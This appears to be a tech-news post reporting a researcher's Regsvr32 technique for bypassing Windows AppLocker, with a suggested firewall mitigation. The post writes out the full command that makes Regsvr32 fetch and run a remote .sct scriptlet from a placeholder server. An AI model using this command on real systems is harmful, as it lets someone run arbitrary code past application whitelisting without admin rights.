Casey Smith, a security researcher in Colorado, has discovered that Regsvr32 can be used to bypass AppLocker on Windows.
AppLocker is a feature introduced in Windows 7 and Windows Server 2008 R2 that allows administrators to specify which users or groups can run particular applications in an organization based on unique identities of files. If you use AppLocker, you can create rules to allow or deny applications from running.
Regsvr32 is a command-line utility that can be used for registering and unregistering DLLs. Using his technique, the process doesn’t alter the system registry, so it will be difficult for admins to find whether any changes was done to the system.
regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll
“The amazing thing here is that regsvr32 is already proxy aware, uses TLS, follows redirects, etc. … And … You guessed a signed, default MS binary. So, all you need to do is host your .sct file at a location you control,” Smith wrote.
This technique doesn’t alter the registry, it doesn’t require administrative privileges, and the scripts can be called over HTTP or HTTPS. There is no patch available for this security issue from Microsoft. For now, you can block Regsvr32.exe with Windows Firewall.
Microsoft is yet to respond about this serious vulnerability. We will update this post once we hear from Microsoft.
Subscribe to our mailing list and get tech updates to your email inbox.
Subscribe to our mailing list and get interesting stuff and updates to your email inbox.